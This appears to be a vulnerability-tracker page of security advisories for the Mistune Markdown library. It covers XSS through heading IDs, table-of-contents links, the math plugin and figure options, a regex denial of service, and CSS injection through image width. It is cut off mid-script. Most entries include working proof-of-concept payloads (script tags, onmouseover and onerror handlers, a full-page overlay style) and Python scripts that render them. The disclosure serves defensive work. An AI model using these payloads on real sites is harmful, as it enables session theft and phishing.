The default hook assigns sequential numeric IDs that never contain user text: ```python md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_src = "# Introduction\n\n## Installation\n" _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) ``` Output — clean, safe TOC: ```html <ul> <li><a href="#toc_1">Introduction</a> <ul> <li><a href="#toc_2">Installation</a></li> </ul> </li> </ul> ``` **Step 2 — Enable the vulnerable `heading_id` callback** Register a callback that returns the raw heading text as the ID. This is the standard slug-based anchor pattern used by documentation generators: ```python def raw_id(token, index): return token.get("text", "") md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ``` **Step 3 — Craft the exploit payload** Construct a heading whose text terminates the `href="#..."` attribute and injects a `<script>` block followed by a dangling `<a href="` to absorb the closing `">` that `render_toc_ul` appends: ``` ## x"><script>alert(document.cookie)</script><a href=" ``` When `raw_id` processes this heading, it returns the entire text as the ID: `x"><script>alert(document.cookie)</script><a href="`. **Step 4 — Observe script injection in the TOC output** ```python ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) ``` `render_toc_ul()` formats the malicious ID directly into the `<a href>`: ```python '<a href="#{}">{}</a>'.format(k, text) # becomes: '<a href="#x"><script>alert(document.cookie)</script><a href="">...</a>' ``` Actual output: ```html <ul> <li><a href="#x"><script>alert(document.cookie)</script><a href="">x&quot;&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;&lt;a href=&quot;</a></li> </ul> ``` The `<script>` block is live in the document. 
Note that the anchor *label* (`text`) is escaped correctly by mistune's inline renderer before it reaches `toc_items`, but `k` (the heading ID) is not escaped anywhere. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H4: render_toc_ul() puts raw heading ID into <a href> without escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook, render_toc_ul def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h4.md" bl_src = "# Introduction\n\n## Installation\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) _, state = md_safe.parse(bl_src) bl_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{bl_file}]\n{bl_src}") print("[toc output — safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h4.md" ex_src = '## x"><script>alert(document.cookie)</script><a href="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) _, state = md_vuln.parse(ex_src) ex_out = render_toc_ul(state.env.get("toc_items", [])) print(f"[{ex_file}]\n{ex_src}") print("[toc output — script injected via href breakout]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit 
.case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>TOC output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H4 — TOC XSS</title><style>{CSS}</style></head><body> <h1>H4 — TOC render_toc_ul() XSS</h1> <p class="desc">render_toc_ul() in toc.py uses '<a href="#{{}}">{{}}</a>'.format(k, text) — neither k (the heading ID) nor text is escaped before insertion.</p> {case("baseline", "Normal headings → sequential IDs → clean TOC links", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading ID breaks out of href='#...' → script injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h4.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once you run the script, open `report_h4.html` in the browser and observe the behaviour. 
## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | JavaScript execution; attacker can exfiltrate session cookies and any data accessible from the page's origin | | **Integrity** | Arbitrary DOM manipulation, phishing form injection, forced redirects | | **Availability** | Page crash or freeze available as secondary effect | **Risk context:** TOC generation is a rendering step that often happens in a different template layer from the main body render, potentially reviewed separately and trusted implicitly. Vulnerabilities in TOC output are frequently overlooked in code review. Combined with H2, an attacker exploiting this via a single malicious heading simultaneously injects into both the heading element and the TOC anchor. | ||
| CVE-2026-33441 | 0.00 | — | — | May 6, 2026 | Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079. |
- risk 0.57 · cvss — · epss 0.00
In versions 3.0.0a1 through 3.2.0 of Mistune, there is a ReDoS (Regular Expression Denial of Service) vulnerability in `LINK_TITLE_RE` that allows an attacker who can supply Markdown for parsing to cause denial of service. The regular expression used for parsing link titles contains overlapping alternatives that can trigger catastrophic backtracking. In both the double-quoted and single-quoted branches, a backslash followed by punctuation can be matched either as an escaped punctuation sequence or as two ordinary characters, creating an ambiguous pattern inside a repeated group. If an attacker supplies Markdown containing repeated ! sequences with no closing quote, the regex engine explores an exponential number of backtracking paths. This is reachable through normal Markdown parsing of inline links and block link reference definitions. A small crafted input can therefore cause significant CPU consumption and make applications using Mistune unresponsive.
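The ambiguity described above can be reproduced with a small stand-in pattern. The sketch below does not use Mistune's `LINK_TITLE_RE`; both patterns and the `crafted()` helper are hypothetical, chosen only to show how a backslash that can match either as part of an escape or as an ordinary character doubles the search paths per repetition, and how mutually exclusive alternatives avoid that.

```python
import re

# Hypothetical stand-ins for illustration; NOT Mistune's actual LINK_TITLE_RE.
# AMBIGUOUS: a backslash + punctuation pair matches either as one escape
# (first alternative) or as two ordinary characters (second alternative).
AMBIGUOUS = re.compile(r'"(?:\\[!-/]|[^"])*"')

# UNAMBIGUOUS: ordinary characters exclude the backslash, and a lone
# backslash is accepted only when it does not start an escape, so exactly
# one alternative can apply at each position.
UNAMBIGUOUS = re.compile(r'"(?:\\[!-/]|\\(?![!-/])|[^"\\])*"')


def crafted(n: int) -> str:
    """Opening quote followed by n backslash-bang pairs and no closing quote."""
    return '"' + "\\!" * n


if __name__ == "__main__":
    # Well-formed titles match under both patterns.
    print(bool(AMBIGUOUS.match('"a\\!b"')), bool(UNAMBIGUOUS.match('"a\\!b"')))
    # Unterminated input: the ambiguous pattern explores roughly 2**n paths,
    # so n is kept small here; the unambiguous one backtracks linearly.
    print(AMBIGUOUS.match(crafted(12)))
    print(UNAMBIGUOUS.match(crafted(5000)))
```

Raising `n` for the ambiguous pattern by one roughly doubles its running time, which is why a few dozen repetitions are enough to stall a parser that uses such a pattern.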
- risk 0.26 · cvss — · epss —
## Summary

`HTMLRenderer.heading()` builds the opening `<hN>` tag by concatenating the `id` attribute value directly into the HTML, with no call to `escape()`, `safe_entity()`, or any other sanitisation function. A double-quote character `"` in the `id` value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, `src=`, `href=`, etc.) into the heading element.

The default TOC hook assigns safe auto-incremented IDs (`toc_1`, `toc_2`, …) that never contain user text. However, the `add_toc_hook()` API accepts a caller-supplied `heading_id` callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like `#installation` or `#getting-started`, is by far the most common real-world usage of this callback (every major documentation generator does this). When the callback returns raw heading text, an attacker who controls heading content can break out of the `id=` attribute.

## Details

**File:** `src/mistune/renderers/html.py`

```python
def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'   # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"
```

The `text` body (line content) *is* escaped upstream by the inline token renderer, which is why a `"` in `text` arrives as `&quot;`. But `_id` arrives as a raw string directly from whatever the `heading_id` callback returned; no escaping occurs at any point in the pipeline.

## PoC

**Step 1: Establish the baseline (safe default IDs)**

The script creates a parser with `escape=True` and the default `add_toc_hook()` (no custom `heading_id` callback). The default hook generates sequential numeric IDs:

```python
from mistune import create_markdown
from mistune.toc import add_toc_hook

md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)   # default: heading_id produces toc_1, toc_2, …
bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
```

Output (the ID is auto-generated, no user text appears in it):

```html
<h2 id="toc_1">Introduction</h2>
```

**Step 2: Add the realistic trigger, a text-based `heading_id` callback**

Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, `mkdocs`, `sphinx`, `jekyll` all do this). The PoC uses the simplest possible version, returning the raw heading text unchanged, to show the vulnerability without any extra transformation:

```python
def raw_id(token, index):
    return token.get("text", "")   # returns raw heading text as the ID

md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
```

**Step 3: Craft the exploit payload**

Construct a heading whose text contains a double quote followed by an injected attribute:

```
## foo" onmouseover="alert(document.cookie)" x="
```

When `raw_id` is called, `token["text"]` is `foo" onmouseover="alert(document.cookie)" x="`. This is passed verbatim to `heading()` as the `id` attribute value.

**Step 4: Observe attribute breakout in the output**

```python
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
```

Actual output:

```html
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
```

Note: the heading **body text** is correctly escaped (`&quot;`), but the **`id=` attribute** is not. A user who moves the mouse over the heading triggers `alert(document.cookie)`. Any JavaScript payload can be substituted.

### Script

The following script verifies the issue. It creates an HTML page that shows the bypass rendering in the browser.
```python #!/usr/bin/env python3 """H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping.""" import os, html as h from mistune import create_markdown from mistune.toc import add_toc_hook def raw_id(token, index): return token.get("text", "") # --- baseline --- md_safe = create_markdown(escape=True) add_toc_hook(md_safe) bl_file = "baseline_h2.md" bl_src = "## Introduction\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out, _ = md_safe.parse(bl_src) print(f"[{bl_file}]\n{bl_src}") print("[output — id=toc_1, no user content, safe]") print(bl_out) # --- exploit --- md_vuln = create_markdown(escape=True) add_toc_hook(md_vuln, heading_id=raw_id) ex_file = "exploit_h2.md" ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n' with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out, _ = md_vuln.parse(ex_src) print(f"[{ex_file}]\n{ex_src}") print("[output — heading_id returns raw text, id= not escaped]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} 
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body> <h1>H2 — Heading ID XSS (unescaped id= attribute)</h1> <p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping. Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p> {case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)} {case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h2.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example Usage: ```bash python poc.py ``` Once the script is run, open `report_h2.html` in the browser and observe the behaviour. 
## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction | | **Integrity** | DOM manipulation, phishing content injection, forced navigation | | **Availability** | Page freeze or crash available to attacker | **Risk context:** This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's `heading_id` callback without independently sanitising the returned value.
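A caller-side mitigation for the pattern above is to make sure the `heading_id` callback can never return attribute-breaking characters. The sketch below is a minimal example under that assumption; `slugify()` and `safe_heading_id()` are hypothetical helper names, and only the `(token, index)` callback shape and the `toc_N` fallback format are taken from the advisory.

```python
import re


def slugify(text: str) -> str:
    """Lowercase the text and collapse every run of other characters to '-'."""
    return re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-")


def safe_heading_id(token: dict, index: int) -> str:
    """heading_id-style callback whose result contains only [a-z0-9_-]."""
    slug = slugify(token.get("text", ""))
    # Fall back to a sequential ID (same shape as the default toc_N IDs)
    # when nothing usable is left after slugification.
    return slug or "toc_" + str(index + 1)


if __name__ == "__main__":
    payload = {"text": 'foo" onmouseover="alert(document.cookie)" x="'}
    print(safe_heading_id(payload, 0))
```

With the signature shown in the PoC, such a callback would be registered as `add_toc_hook(md, heading_id=safe_heading_id)`. This sketch does not deduplicate IDs, and non-ASCII headings collapse to the sequential fallback. It only constrains the ID at the source; escaping the value inside `heading()` remains the more robust fix.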
- risk 0.26 · cvss — · epss —
In `src/mistune/directives/image.py`, the `render_figure()` function concatenates `figclass` and `figwidth` options directly into HTML attributes without escaping (lines 152-168). This allows attribute injection and XSS even when `HTMLRenderer(escape=True)` is used, because these values bypass the inline renderer. Other attributes in the same file (src, alt, style) are properly escaped; figclass/figwidth were missed.
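The missing step described above is attribute-context escaping of the two option values. The sketch below illustrates the idea with the standard library only; `figure_open_tag()` and the exact tag layout are hypothetical and are not copied from Mistune's `render_figure()`.

```python
import html
from typing import Optional


def figure_open_tag(figclass: Optional[str] = None,
                    figwidth: Optional[str] = None) -> str:
    """Build an opening <figure> tag with each option escaped for attribute use."""
    tag = '<figure class="figure'
    if figclass:
        # quote=True also escapes " and ', so the value cannot close the attribute.
        tag += " " + html.escape(figclass, quote=True)
    tag += '"'
    if figwidth:
        tag += ' style="width:' + html.escape(figwidth, quote=True) + '"'
    return tag + ">"


if __name__ == "__main__":
    print(figure_open_tag('x" onclick="alert(1)', "50%"))
```

Escaping stops the value from breaking out of the attribute, but a `figwidth` such as `50%;position:fixed` would still be valid CSS inside `style=`, so the width value would additionally need to be validated as a plain length.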
- risk 0.26 · cvss — · epss —
## Summary

The mistune math plugin renders inline math (`$...$`) and block math (`$$...$$`) by concatenating the raw user-supplied content directly into the HTML output **without any HTML escaping**. This occurs even when the parser is explicitly created with `escape=True`, which is supposed to guarantee that all user-controlled text is sanitised before reaching the DOM.

The result is a silent contract violation: a developer who enables `escape=True` reasonably expects complete XSS protection, but the math plugin operates as an independent render path that ignores the renderer's `_escape` flag entirely.

## Details

**File:** `src/mistune/plugins/math.py`

```python
def render_inline_math(renderer, text):
    # `text` is raw user input; there is no escape() call anywhere
    return r'<span class="math">\(' + text + r"\)</span>"

def render_block_math(renderer, text):
    # same issue for block-level $$...$$
    return '<div class="math">$$\n' + text + "\n$$</div>\n"
```

Both functions take `text` directly from the parsed token and concatenate it into the output string. Neither function:

- calls `escape(text)` from `mistune.util`
- checks `renderer._escape`
- calls `safe_entity(text)` or any other sanitisation helper

The `escape=True` flag only influences the main `HTMLRenderer` methods (`paragraph`, `heading`, `codespan`, etc.). Plugin render functions registered via `md.renderer.register()` receive the `renderer` instance but have no mechanism that enforces the escape contract; they must opt in manually, and `math.py` does not.

## PoC

**Step 1: Establish the baseline (`escape=True` works for plain HTML)**

The script creates a markdown parser with `escape=True` and the math plugin enabled, then feeds it a raw `<script>` tag that is *not* inside math delimiters:

```python
from mistune import create_markdown

md = create_markdown(escape=True, plugins=["math"])
bl_src = "<script>alert(document.cookie)</script>\n"
bl_out = str(md(bl_src))
```

Expected and actual output (the script tag is correctly escaped):

```html
<p>&lt;script&gt;alert(document.cookie)&lt;/script&gt;</p>
```

This confirms `escape=True` is working for the normal render path.

**Step 2: Craft the exploit payload**

Wrap the identical `<script>` payload inside inline math delimiters `$...$`. The content is extracted from the token as `text` and handed to `render_inline_math()`:

```python
ex_src = "$<script>alert(document.cookie)</script>$\n"
ex_out = str(md(ex_src))
```

**Step 3: Observe the bypass**

Actual output (the script tag is emitted raw, unescaped):

```html
<p><span class="math">\(<script>alert(document.cookie)</script>\)</span></p>
```

The `<script>` block is live inside the `<span class="math">` wrapper. Any browser that renders this HTML will execute `alert(document.cookie)`.

**Step 4: Block math variant (`$$...$$`)**

The same bypass applies to block-level math. Payload:

```
$$
<img src=x onerror="alert(document.cookie)">
$$
```

Output:

```html
<div class="math">$$
<img src=x onerror="alert(document.cookie)">
$$</div>
```

The `onerror` handler fires as soon as the browser tries to load the non-existent image `x`.

### Script

The following script verifies the issue. It creates an HTML page that shows the bypass rendering in the browser.
```python #!/usr/bin/env python3 """H1: Math plugin bypasses escape=True — HTML inside $...$ passes through raw.""" import os, html as h from mistune import create_markdown md = create_markdown(escape=True, plugins=["math"]) # --- baseline --- bl_file = "baseline_h1.md" bl_src = "<script>alert(document.cookie)</script>\n" with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — escape=True works normally here]") print(bl_out) # --- exploit --- ex_file = "exploit_h1.md" ex_src = "$<script>alert(document.cookie)</script>$\n" with open(os.path.join(os.getcwd(), ex_file), "w") as f: f.write(ex_src) ex_out = str(md(ex_src)) print(f"[{ex_file}]\n{ex_src}") print("[output — escape=True bypassed inside math delimiters]") print(ex_out) # --- HTML report --- CSS = """ body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px} h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px} p.desc{color:#555;font-size:.9em;margin-top:6px} .case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)} .case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em} .baseline .case-header{background:#d1fae5;color:#065f46} .exploit .case-header{background:#fee2e2;color:#7f1d1d} .panels{display:grid;grid-template-columns:1fr 1fr;background:#fff} .panel{padding:16px} .panel+.panel{border-left:1px solid #eee} .panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em} pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all} .rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace} .rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em} """ 
def case(kind, label, filename, src, out): return f""" <div class="case {kind}"> <div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div> <div class="panels"> <div class="panel"> <h3>Input — {h.escape(filename)}</h3> <pre>{h.escape(src)}</pre> </div> <div class="panel"> <h3>Output — HTML source</h3> <pre>{h.escape(out)}</pre> <div class="rlabel">↓ rendered in browser</div> <div class="rendered">{out}</div> </div> </div> </div>""" page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <title>H1 — Math XSS</title><style>{CSS}</style></head><body> <h1>H1 — Math Plugin XSS (escape=True bypass)</h1> <p class="desc">render_inline_math() in plugins/math.py concatenates user content without escape(). The escape=True renderer flag is completely ignored inside $...$ delimiters.</p> {case("baseline", "Same HTML outside $...$ — escape=True works", bl_file, bl_src, bl_out)} {case("exploit", "Same HTML inside $...$ — escape=True bypassed", ex_file, ex_src, ex_out)} </body></html>""" out_path = os.path.join(os.getcwd(), "report_h1.html") with open(out_path, "w") as f: f.write(page) print(f"\n[report] {out_path}") ``` Example usage: ```bash python poc.py ``` Once the script is run, open `report_h1.html` in the browser and observe the behaviour. ## Impact | Dimension | Assessment | |------------------|-----------| | **Confidentiality** | Attacker can exfiltrate session cookies, auth tokens, and any data visible to the victim's browser session | | **Integrity** | Attacker can mutate page content, inject phishing forms, redirect the user, or perform authenticated actions | | **Availability** | Attacker can crash or freeze the page (denial-of-service to the user) | **Risk amplifier:** This is a *bypass* of an explicit security control. Developers who have audited their application and confirmed `escape=True` is set believe they have XSS protection. 
This vulnerability silently invalidates that assumption for every math-enabled parser instance, making it likely to be missed in code reviews and security audits.
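The opt-in escaping that the math render functions lack can be sketched as follows. This is an illustrative variant of the two functions quoted in the advisory, using the standard library's `html.escape` in place of Mistune's own helper; the `_escaped` function names are hypothetical, and this is not presented as the upstream patch.

```python
import html


def render_inline_math_escaped(renderer, text: str) -> str:
    # Same wrapper as the advisory's render_inline_math, with the body escaped.
    return r'<span class="math">\(' + html.escape(text) + r"\)</span>"


def render_block_math_escaped(renderer, text: str) -> str:
    # Same wrapper as the advisory's render_block_math, with the body escaped.
    return '<div class="math">$$\n' + html.escape(text) + "\n$$</div>\n"


if __name__ == "__main__":
    # The renderer argument is unused in this sketch, so None is passed.
    print(render_inline_math_escaped(None, "<script>alert(document.cookie)</script>"))
    print(render_block_math_escaped(None, '<img src=x onerror="alert(document.cookie)">'))
```

Assuming the plugin registers its renderers under the names `inline_math` and `block_math`, an application could re-register these replacements through `md.renderer.register()` after enabling the plugin. Because the browser decodes entities back into text, a client-side math renderer that reads the element's text content should still see the original formula source.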
- CVE-2026-44899 · May 14, 2026 · risk 0.00 · cvss — · epss —
## Summary The Image directive plugin validates the `:width:` and `:height:` options with a regex compiled as `_num_re = re.compile(r"^\d+(?:\.\d*)?")`. This pattern is applied via `re.match()` (which anchors only at the **start** of the string, not the end). Any value that begins with one or more digits passes validation, regardless of what follows. When the validated value is not a plain integer, `render_block_image()` inserts it directly into a `style="width:...;"` or `style="height:...;"` attribute. Because the value was accepted by the prefix-only regex, any CSS after the leading digits reaches the `style=` attribute verbatim and without escaping. An attacker can therefore inject an arbitrary chain of CSS properties — including `position:fixed`, `background-color`, `z-index`, `outline`, and `opacity` — using nothing more than a single `:width:` option in a fenced image directive. The resulting element can visually cover the entire browser viewport, enabling full-page phishing overlays and UI redressing attacks. ## Details **File:** `src/mistune/directives/image.py` ```python _num_re = re.compile(r"^\d+(?:\.\d*)?") # no $ anchor — prefix match only def _parse_attrs(options): height = options.get("height") width = options.get("width") if height and _num_re.match(height): # passes if value STARTS with a digit attrs["height"] = height # full value stored, not just digits if width and _num_re.match(width): # same — prefix-only check attrs["width"] = width ``` And in `render_block_image()`: ```python if width: if width.isdigit(): img += ' width="' + width + '"' # safe: integer → HTML attribute else: style += "width:" + width + ";" # UNSAFE: non-integer → raw style value ``` The `isdigit()` branch correctly uses an HTML attribute for plain integers. The `else` branch assumes that anything that passed `_num_re.match()` is a safe CSS length like `100px` or `50%`. 
However, because the regex is prefix-only, `100vw;height:100vh;position:fixed;...` also passes, and the entire string lands in `style=` unmodified. ## PoC **Step 1 — Establish the baseline (safe plain-integer dimensions)** The script creates a parser with `escape=True`, `FencedDirective`, and the `Image` plugin. A safe image directive is rendered with integer `width` and `height`: ```python md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) bl_out = str(md(bl_src)) ``` Expected and actual output — clean `width=` and `height=` HTML attributes, no `style=`: ```html <div class="block-image"><img src="photo.jpg" alt="safe image" width="400" height="300" /></div> ``` **Step 2 — Understand why non-integer widths go into `style=`** When `width` is not a plain integer (e.g., `100px`), `width.isdigit()` returns `False`, so the render path falls through to `style += "width:" + width + ";"`. This is the intended mechanism for CSS-unit dimensions. The flaw is that `_num_re.match()` lets far more than CSS units through. 
**Step 3 — Craft the exploit payload** Provide a `:width:` value that begins with a valid number (satisfying `_num_re.match()`) but appends an entire CSS attack chain after it: ``` :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 ``` - `100vw` — starts with `1`, passes `_num_re.match()`; also sets the width to full viewport width - `;height:100vh` — overrides height to full viewport height - `;position:fixed` — lifts element out of document flow, fixed to the browser viewport - `;top:0;left:0` — anchors overlay to the top-left corner - `;z-index:9999` — places it above all other page content - `;background-color:#e11d48` — fills the overlay with vivid crimson - `;outline:8px solid #facc15` — adds a bright yellow border - `;color:#fff;opacity:.93` — styles the alt-text label in white with near-full opacity Full exploit markdown: ``` ```{image} x.jpg :width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93 :alt: ⚠ CSS INJECTED — click to dismiss ⚠ ``` ``` **Step 4 — Observe the injected `style=` in the output** ```python ex_src = ( "```{image} x.jpg\n" ":width: 100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;" "background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93\n" ":alt: ⚠ CSS INJECTED — click to dismiss ⚠\n" "```\n" ) ex_out = str(md(ex_src)) ``` Actual output: ```html <div class="block-image"><img src="x.jpg" alt="⚠ CSS INJECTED — click to dismiss ⚠" style="width:100vw;height:100vh;position:fixed;top:0;left:0;z-index:9999;background-color:#e11d48;outline:8px solid #facc15;color:#fff;opacity:.93;" /></div> ``` Every injected CSS property is present in the `style=` attribute. 
When a browser renders this HTML, the `<img>` element: - expands to fill 100% of the viewport width and height - sits fixed at the top-left corner, scrolling with the viewport - is coloured crimson with a yellow outline - appears above all other page content The result is a complete full-page phishing overlay generated from a single Markdown image directive. ### Script I have built a script that you can use to verify this. It creates a HTML page showing the bypass so that you can see it render in the browser. ```python #!/usr/bin/env python3 """H6: Image directive CSS injection — width/height use prefix-only re.match(). Exploit combines: position:fixed + background-color + outline colour → a full-viewport coloured overlay injected via a single :width: option. """ import os, html as h from mistune import create_markdown from mistune.directives import FencedDirective from mistune.directives.image import Image md = create_markdown(escape=True, plugins=[FencedDirective([Image()])]) # --- baseline --- bl_file = "baseline_h6.md" bl_src = ( "```{image} photo.jpg\n" ":width: 400\n" ":height: 300\n" ":alt: safe image\n" "```\n" ) with open(os.path.join(os.getcwd(), bl_file), "w") as f: f.write(bl_src) bl_out = str(md(bl_src)) print(f"[{bl_file}]\n{bl_src}") print("[output — clean width/height attributes, no style injection]") print(bl_out) # --- exploit --- # _num_re.match() is prefix-only (no $ anchor), so anything after the leading # digits is accepted and written verbatim into style="width:<value>;". 
